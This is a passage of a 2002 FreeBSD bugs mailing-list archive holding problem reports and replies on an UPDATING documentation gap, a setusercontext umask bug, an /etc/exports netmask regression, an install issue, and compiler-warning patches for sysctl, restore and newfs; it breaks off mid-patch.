g5QKADJU047202 for ; Wed, 26 Jun 2002 13:10:14 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QKAD1s047189; Wed, 26 Jun 2002 13:10:13 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 908EA37C449 for ; Wed, 26 Jun 2002 12:28:43 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QJRsOT060067 for ; Wed, 26 Jun 2002 12:27:54 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5QJRsct060066; Wed, 26 Jun 2002 12:27:54 -0700 (PDT) Message-Id: <200206261927.g5QJRsct060066@www.freebsd.org> Date: Wed, 26 Jun 2002 12:27:54 -0700 (PDT) From: John Glass To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/39892: Missing information in UPDATING Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39892 >Category: i386 >Synopsis: Missing information in UPDATING >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 13:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: John Glass >Release: 4.6 STABLE >Organization: >Environment: > uname -an FreeBSD ns3.upn.net 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun 25 20:36:39 GMT 2002 root@localhost:/usr/obj/usr/src/sys/NS1 i386 > >Description: I recently decided to do a fresh install on a new machine - 4.4 install, then CVSUP to 4.6 release, make buildworld, make buildkernel, installworld, etc. I tried to do installworld (without reading UPDATING) and ran into the first problem - no smmsp user. The message reads: 20020404: Due to the import of sendmail 8.12.2 (see 20020325 entry), a new user and group are required in order for sendmail to run as a set-group-ID binary. A 'make installworld' will use the new user and group to set the owner and group of /var/spool/clientmqueue and will fail if the new user and group do not exist. The 'smmsp' user and group must be merged from src/etc/group and src/etc/master.passwd before using 'make installworld'. 'mergemaster -p' will do this. You may need to install mergemaster before this will work if you are updating from a very old version of stable. This can be done with: cd /usr/src/usr.sbin/mergemaster; make all install [clean] 'Older' versions appear to be anything that doesn't have the new mergemaster. I merged the changes into /etc/master.passwd and /etc/group, but when I reran installworld, I still had the same problem. After some searching around, I figured out that /etc/passwd needs to be updated from master.passwd. I found that I needed to run pwd_mkdb -p /etc/master.passwd to update my passwd file. I've rewritten what I think the message should say below. I believe it will clear up any confusion other users may have. (Then again, I could just be stupid and be missing something) Please let me know if there is anything wrong with it. Thanks >How-To-Repeat: >Fix: 20020404: Due to the import of sendmail 8.12.2 (see 20020325 entry), a new user and group are required in order for sendmail to run as a set-group-ID binary. A 'make installworld' will use the new user and group to set the owner and group of /var/spool/clientmqueue and will fail if the new user and group do not exist. The 'smmsp' user and group must be merged from src/etc/group and src/etc/master.passwd before using 'make installworld'. 'mergemaster -p' will do this. You may need to install mergemaster before this will work if you are updating from a very old version of stable. This can be done with: cd /usr/src/usr.sbin/mergemaster; make all install [clean]If you manually import the changes to /etc/master.passwd, be sure to run 'pwd_mkdb -p /etc/master.passwd' to update your /etc/passwd file. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 13:28:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1B59A37C576 for ; Wed, 26 Jun 2002 13:10:43 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QKAYJU047288 for ; Wed, 26 Jun 2002 13:10:37 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QKAP9G047265; Wed, 26 Jun 2002 13:10:25 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 3F32237B79A for ; Wed, 26 Jun 2002 13:01:43 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QJY4OT060554 for ; Wed, 26 Jun 2002 12:34:04 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5QJY4UY060553; Wed, 26 Jun 2002 12:34:04 -0700 (PDT) Message-Id: <200206261934.g5QJY4UY060553@www.freebsd.org> Date: Wed, 26 Jun 2002 12:34:04 -0700 (PDT) From: "George V. Kouryachy" To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/39893: setusercontext library call differs umask Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39893 >Category: bin >Synopsis: setusercontext library call differs umask >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 13:10:15 PDT 2002 >Closed-Date: >Last-Modified: >Originator: George V. Kouryachy >Release: 4.6-RELEASE >Organization: Moscow State Univercity >Environment: FreeBSD phobos.cs.msu.su 4.6-RELEASE FreeBSD 4.6-RELEASE #6: Thu Jun 20 17:44:32 MSD 2002 toor@phobos.cs.msu.su:/usr/obj/usr/src/sys/PHOBOS i386 >Description: When calling setusercontext to the user, which have an 'umask=' entry in his login class in /etc/login.conf, some umasks are set incorrectly, E.g. when using "umask=407" (for incoming FTP not to store warez :) actually got d--xr-x--- instead of d-wxrwx--- permissions. >How-To-Repeat: Add test:umask=407:\ :tc=default: in /etc/login.conf, call cap_mkdb /etc/login.conf and do pw user add tmpuser -L test -m to create user. simple program: #include #include #include #include #include int main(int argc, char *argv[]) { struct passwd *pw; rmdir("/tmp/tmpdir"); pw = getpwnam("tmpuser"); setusercontext(NULL, pw, (uid_t)0, LOGIN_SETLOGIN|LOGIN_SETGROUP|LOGIN_SETPRIORITY| LOGIN_SETRESOURCES|LOGIN_SETUMASK); system("mkdir /tmp/tmpdir"); system("ls -al /tmp/tmpdir"); } will show total 4 d--xr-x--- 2 root wheel 512 26 июн 23:32 . drwxrwxrwt 8 root wheel 512 26 июн 23:32 .. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 16:16:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2EBF537B9A1; Wed, 26 Jun 2002 16:05:04 -0700 (PDT) Received: from freefall.freebsd.org (dougb@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QN4VJU075500; Wed, 26 Jun 2002 16:04:31 -0700 (PDT) (envelope-from dougb@freefall.freebsd.org) Received: (from dougb@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QN4Vtx075496; Wed, 26 Jun 2002 16:04:31 -0700 (PDT) Date: Wed, 26 Jun 2002 16:04:31 -0700 (PDT) From: Doug Barton Message-Id: <200206262304.g5QN4Vtx075496@freefall.freebsd.org> To: john@johncglass.com, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/39892: Missing information in UPDATING Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Missing information in UPDATING State-Changed-From-To: open->closed State-Changed-By: dougb State-Changed-When: Wed Jun 26 16:00:59 PDT 2002 State-Changed-Why: The UPDATING file contains the recommended procedure, which is known to work. Users who deviate from that procedure are expected to be able to handle these kinds of problems themselves. http://www.freebsd.org/cgi/query-pr.cgi?pr=39892 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 16:35: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 178E537BE41 for ; Wed, 26 Jun 2002 16:20:02 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5QNK1JU081241 for ; Wed, 26 Jun 2002 16:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5QNK1Au081240; Wed, 26 Jun 2002 16:20:01 -0700 (PDT) Received: from eubie.lbl.gov (eubie.lbl.gov [131.243.2.36]) by hub.freebsd.org (Postfix) with ESMTP id 6508237B83C for ; Wed, 26 Jun 2002 16:01:14 -0700 (PDT) Received: from eubie.lbl.gov (localhost [127.0.0.1]) by eubie.lbl.gov (8.12.3/8.12.3) with ESMTP id g5QKuFRX000410 for ; Wed, 26 Jun 2002 13:56:15 -0700 (PDT) (envelope-from jin@eubie.lbl.gov) Received: (from root@localhost) by eubie.lbl.gov (8.12.3/8.12.3/Submit) id g5QKuFY0000409; Wed, 26 Jun 2002 13:56:15 -0700 (PDT) Message-Id: <200206262056.g5QKuFY0000409@eubie.lbl.gov> Date: Wed, 26 Jun 2002 13:56:15 -0700 (PDT) From: Jin Guojun (DSD staff) Reply-To: j_guojun@lbl.gov To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39896 >Category: bin >Synopsis: netmask 0xffffff00 no longer works in /etc/exports >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 16:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jin Guojun (DSD staff) >Release: FreeBSD 4.6-RELEASE i386 >Organization: >Environment: FreeBSD 4.6-RELEASE >Description: Somehow, netmask format in /etc/exports is restricted to ###.###.###.### only. /data -maproot=bin: -network 131.104.48 -mask 255.255.255.0 eubie# kill -HUP `cat /var/run/mountd.pid` eubie# mount eubie:/data /mnt eubie# The following format does not work any more /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 mountd does not complain, but silently denies to export this partition: eubie# kill -HUP `cat /var/run/mountd.pid` eubie# mount eubie:/data /mnt eubie:/data: Permission denied >How-To-Repeat: add similar line to /etc/exports, restart mountd, and mount this partition locally or remotely. /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 >Fix: Is any reason to make such change? or Is this a bug? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 17:15:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 77DC537CA55 for ; Wed, 26 Jun 2002 17:10:05 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0A5JU090455 for ; Wed, 26 Jun 2002 17:10:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0A5Oe090454; Wed, 26 Jun 2002 17:10:05 -0700 (PDT) Date: Wed, 26 Jun 2002 17:10:05 -0700 (PDT) Message-Id: <200206270010.g5R0A5Oe090454@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Mike Todd" Subject: Re: i386/39604: Install failure on HP Pavilion 310n - Unable to make device node for /dev/X in /dev. Reply-To: "Mike Todd" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/39604; it has been noted by GNATS. From: "Mike Todd" To: , "Mike Todd" Cc: Subject: Re: i386/39604: Install failure on HP Pavilion 310n - Unable to make device node for /dev/X in /dev. Date: Wed, 26 Jun 2002 17:01:45 -0700 Recommend changing the state of this problem report to something like "found a fix" or "problem resolved". It was a problem of discovery instead of needing a patch to the FreeBSD installation. I've discovered the meaning of "Unable to make device node for /dev/X in /dev! The creation of filesystem will be aborted." The HP Pavilion 310 has a hidden, primary slice (partition) that is about 5 gigs and contains the files needed to restore the Windows/XP system. Adding a partition for BootMagic and creating additional partitions for FreeBSD and an Extended partition for Window's use exceeded the number of partitions allowed. This caused FreeBSD to name its second slice "X" rather than ad0s5, of course. My solution was to remove BootMagic and its partition (moving both HP partitions to the "front" of the drive", and then devoting all remaining space to FreeBSD (the non-partitioned free space at the "end" of the drive). My suggestion to HP is to create "restore CDs" so that a hidden partition is not required. Mike Todd President, Mike Todd Associates www.MikeTodd.com Supporting the Digital Coast President, Internet Society Los Angeles Chapter www.ISOC-LosAngeles.org Center for Entrepreneurship and Technology Law Pepperdine University Law School Voice: 714-846-7257 FAX: 714-846-5716 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 17:42:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B3B437D155; Wed, 26 Jun 2002 17:39:09 -0700 (PDT) Received: from freefall.freebsd.org (jmallett@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0d9JU093664; Wed, 26 Jun 2002 17:39:09 -0700 (PDT) (envelope-from jmallett@freefall.freebsd.org) Received: (from jmallett@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0d8FY093657; Wed, 26 Jun 2002 17:39:08 -0700 (PDT) Date: Wed, 26 Jun 2002 17:39:08 -0700 (PDT) From: Juli Mallett Message-Id: <200206270039.g5R0d8FY093657@freefall.freebsd.org> To: stefan.duerholt@t-online.de, jmallett@FreeBSD.org, freebsd-bugs@FreeBSD.org, green@FreeBSD.org Subject: Re: bin/22351: sed(1) fails with backslash on buffer boundary in subst expressions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sed(1) fails with backslash on buffer boundary in subst expressions State-Changed-From-To: open->suspended State-Changed-By: jmallett State-Changed-When: Wed Jun 26 17:38:24 PDT 2002 State-Changed-Why: Over to Brian since I think he fixed this; suspend it, he can close it. Responsible-Changed-From-To: freebsd-bugs->green Responsible-Changed-By: jmallett Responsible-Changed-When: Wed Jun 26 17:38:24 PDT 2002 Responsible-Changed-Why: Over to Brian since I think he fixed this; suspend it, he can close it. http://www.freebsd.org/cgi/query-pr.cgi?pr=22351 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 17:45:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7F27337D1A8 for ; Wed, 26 Jun 2002 17:40:05 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0e5JU093792 for ; Wed, 26 Jun 2002 17:40:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0e5TF093791; Wed, 26 Jun 2002 17:40:05 -0700 (PDT) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id CC4E637D0D6 for ; Wed, 26 Jun 2002 17:37:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5R0bVTt061818 for ; Thu, 27 Jun 2002 02:37:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5R0Q3p6061265; Thu, 27 Jun 2002 02:26:03 +0200 (CEST) Message-Id: <200206270026.g5R0Q3p6061265@obluda.cz> Date: Thu, 27 Jun 2002 02:26:03 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39904: cleaning sbin/fsdb code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39904 >Category: bin >Synopsis: cleaning sbin/sysctl code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 17:40:04 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/sysctl/sysctl.c,v 1.25.2.8 2002/03/16 15:49:08 >Description: sbin/sysctl/sysctl.c:387: warning: missing braces around initializer sbin/sysctl/sysctl.c:387: warning: (near initialization for `maj2name[0]') sbin/sysctl/sysctl.c: In function `machdep_bootdev': 401: warning: suggest parentheses around comparison in operand of & 402: warning: unsigned int format, u_long arg (arg 2) >How-To-Repeat: N/A >Fix: --- sysctl.c.ORIG Tue Mar 19 02:56:07 2002 +++ sysctl.c Thu Jun 27 02:22:49 2002 @@ -384,12 +384,12 @@ int majdev; char *name; } maj2name[] = { - 30, "ad", - 0, "wd", - 1, "wfd", - 2, "fd", - 4, "da", - -1, NULL /* terminator */ + { 30, "ad" }, + { 0, "wd" }, + { 1, "wfd" }, + { 2, "fd" }, + { 4, "da" }, + { -1, NULL } /* terminator */ }; static int @@ -398,8 +398,8 @@ int majdev, unit, slice, part; struct _foo *p; - if (value & B_MAGICMASK != B_DEVMAGIC) { - printf("invalid (0x%08x)", value); + if ( (value & B_MAGICMASK) != B_DEVMAGIC) { + printf("invalid (0x%08lx)", value); return 0; } majdev = B_TYPE(value); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 17:54: 4 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA23E37D568 for ; Wed, 26 Jun 2002 17:50:01 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0o1JU095071 for ; Wed, 26 Jun 2002 17:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0o11c095070; Wed, 26 Jun 2002 17:50:01 -0700 (PDT) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id D926E37D0DD for ; Wed, 26 Jun 2002 17:37:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5R0bVTv061818 for ; Thu, 27 Jun 2002 02:37:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from dan@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5R01pPT060838; Thu, 27 Jun 2002 02:01:51 +0200 (CEST) Message-Id: <200206270001.g5R01pPT060838@obluda.cz> Date: Thu, 27 Jun 2002 02:01:51 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39905: cleaning sbin/restore code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39905 >Category: bin >Synopsis: cleaning sbin/restore code from warnings >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 17:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/restore/dirs.c,v 1.14.2.5 2001/10/15 13:44:45 src/sbin/restore/tape.c,v 1.16.2.7 2002/03/01 21:32:28 >Description: sbin/restore/dirs.c: In function `extractdirs': 154: warning: int format, time_t arg (arg 4) 167: warning: int format, time_t arg (arg 4) /usr/src/sbin/restore/dirs.c: In function `setdirmodes': 605: warning: int format, time_t arg (arg 4) time_t is _BSD_TIME_T e.g. long sbin/restore/tape.c: In function `newtapebuf': 167: warning: type defaults to `int' in declaration of `tapebufsize' it cost nothing to write explicit `int' declaration sbin/restore/tape.c: In function `getvol': 405: warning: long int format, int32_t arg (arg 3) 426: warning: long int format, daddr_t arg (arg 4) daddr_t is int32_t, int32_t is int sbin/restore/tape.c: In function `printdumpinfo': 523: warning: long int format, int32_t arg (arg 3) sbin/restore/tape.c: In function `accthdr': 1177: warning: long int format, int32_t arg (arg 3) >How-To-Repeat: N/A >Fix: --- sbin/restore/dirs.c.ORIG Sun Oct 28 01:07:09 2001 +++ sbin/restore/dirs.c Thu Jun 27 00:38:56 2002 @@ -151,7 +151,7 @@ vprintf(stdout, "Extract directories from tape\n"); if ((tmpdir = getenv("TMPDIR")) == NULL || tmpdir[0] == '\0') tmpdir = _PATH_TMP; - (void) sprintf(dirfile, "%s/rstdir%d", tmpdir, dumpdate); + (void) sprintf(dirfile, "%s/rstdir%ld", tmpdir, dumpdate); if (command != 'r' && command != 'R') { (void *) strcat(dirfile, "-XXXXXX"); fd = mkstemp(dirfile); @@ -164,7 +164,7 @@ done(1); } if (genmode != 0) { - (void) sprintf(modefile, "%s/rstmode%d", tmpdir, dumpdate); + (void) sprintf(modefile, "%s/rstmode%ld", tmpdir, dumpdate); if (command != 'r' && command != 'R') { (void *) strcat(modefile, "-XXXXXX"); fd = mkstemp(modefile); @@ -602,7 +602,7 @@ if ((tmpdir = getenv("TMPDIR")) == NULL || tmpdir[0] == '\0') tmpdir = _PATH_TMP; if (command == 'r' || command == 'R') - (void) sprintf(modefile, "%s/rstmode%d", tmpdir, dumpdate); + (void) sprintf(modefile, "%s/rstmode%ld", tmpdir, dumpdate); if (modefile[0] == '#') { panic("modefile not defined\n"); fprintf(stderr, "directory mode, owner, and times not set\n"); --- sbin/restore/tape.c.ORIG Sat Mar 2 14:43:03 2002 +++ sbin/restore/tape.c Thu Jun 27 01:57:52 2002 @@ -164,7 +164,7 @@ newtapebuf(size) long size; { - static tapebufsize = -1; + static int tapebufsize = -1; ntrec = size; if (size <= tapebufsize) @@ -402,7 +402,7 @@ goto again; } if (tmpbuf.c_volume != volno) { - fprintf(stderr, "Wrong volume (%ld)\n", tmpbuf.c_volume); + fprintf(stderr, "Wrong volume (%d)\n", tmpbuf.c_volume); volno = 0; goto again; } @@ -422,7 +422,7 @@ * If coming to this volume at random, skip to the beginning * of the next record. */ - dprintf(stdout, "last rec %ld, tape starts with %ld\n", prevtapea, + dprintf(stdout, "last rec %ld, tape starts with %d\n", prevtapea, tmpbuf.c_tapea); if (tmpbuf.c_type == TS_TAPE && (tmpbuf.c_flags & DR_NEWHEADER)) { if (curfile.action != USING) { @@ -519,7 +519,7 @@ (spcl.c_ddate == 0) ? "the epoch\n" : ctime(&spcl.c_ddate)); if (spcl.c_host[0] == '\0') return; - fprintf(stderr, "Level %ld dump of %s on %s:%s\n", + fprintf(stderr, "Level %d dump of %s on %s:%s\n", spcl.c_level, spcl.c_filesys, spcl.c_host, spcl.c_dev); fprintf(stderr, "Label: %s\n", spcl.c_label); } @@ -1173,7 +1173,7 @@ fprintf(stderr, "Volume header (%s inode format) ", oldinofmt ? "old" : "new"); if (header->c_firstrec) - fprintf(stderr, "begins with record %ld", + fprintf(stderr, "begins with record %d", header->c_firstrec); fprintf(stderr, "\n"); previno = 0x7fffffff; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 26 17:57:44 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 081B437D56A for ; Wed, 26 Jun 2002 17:50:02 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5R0o1JU095084 for ; Wed, 26 Jun 2002 17:50:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5R0o1VR095083; Wed, 26 Jun 2002 17:50:01 -0700 (PDT) Received: from xkulesh.vol.cz (xkulesh.vol.cz [195.250.154.106]) by hub.freebsd.org (Postfix) with ESMTP id DB8D637D0DF for ; Wed, 26 Jun 2002 17:37:33 -0700 (PDT) Received: from obluda.cz (localhost [127.0.0.1]) by xkulesh.vol.cz (8.12.3/8.12.3) with ESMTP id g5R0bVU1061818 for ; Thu, 27 Jun 2002 02:37:31 +0200 (CEST) (envelope-from dan@obluda.cz) Received: (from root@localhost) by obluda.cz (8.12.4/8.12.4/Submit) id g5QLX9Hm059297; Wed, 26 Jun 2002 23:33:09 +0200 (CEST) Message-Id: <200206262133.g5QLX9Hm059297@obluda.cz> Date: Wed, 26 Jun 2002 23:33:09 +0200 (CEST) From: Dan Lukes Reply-To: Dan Lukes To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39906: cleaning sbin/newfs code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39906 >Category: bin >Synopsis: cleaning sbin/newfs code from warnings >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Jun 26 17:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dan Lukes >Release: FreeBSD 4.6-STABLE i386 >Organization: Obludarium >Environment: System: FreeBSD xkulesh.vol.cz 4.6-STABLE FreeBSD src/sbin/newfs/newfs.c,v 1.30.2.8 2001/12/14 09:03:48 src/sbin/newfs/mkfs.c,v 1.29.2.6 2001/09/21 19:15:21 >Description: sbin/newfs/newfs.c: In function `main': 232: warning: `fsi' might be used uninitialized in this function 233: warning: `cp' might be used uninitialized in this function fsi IS used uninitialized under certain condition cp is NOT used uninitialized mfs is set when program is invoked under name containing string 'mfs' (mount_mfs for example) disktype contain the '-T' option value 1. when (mfs && disktype != NULL) then fsi is NEVER initialized 2. if (mfs && !strcmp(special, "swap") then "goto havelabel" skip fsi initialisation also despite of it, close(fsi) IS called. mkfs(pp, special, fsi, fso) is called too, but it doesn't use fsi in mfs mode ================================================================ there are some non-critical warnings also: sbin/newfs/newfs.c: 626: warning: implicit declaration of function `rewritelabel' warning: return-type defaults to `int' In function `rewritelabel': 702: warning: `return' with no value, in function returning non-void 710: warning: control reaches end of non-void function 1. missing 'void' in rewritelabel declaration 2. rewritelabel used before declared sbin/newfs/mkfs.c: In function `started': 1203: warning: implicit declaration of function `fatal' fatal really used without declaration >How-To-Repeat: N/A >Fix: --- src/sbin/newfs/newfs.c.ORIG Mon Dec 17 00:03:01 2001 +++ src/sbin/newfs/newfs.c Wed Jun 26 23:20:46 2002 @@ -216,6 +216,8 @@ extern void mkfs __P((struct partition *, char *, int, int)); static void usage __P((void)); +void rewritelabel __P((char *, int, register struct disklabel *)); + int main(argc, argv) int argc; @@ -229,8 +231,8 @@ struct partition oldpartition; struct stat st; struct statfs *mp; - int fsi, fso, len, n, vflag; - char *cp, *s1, 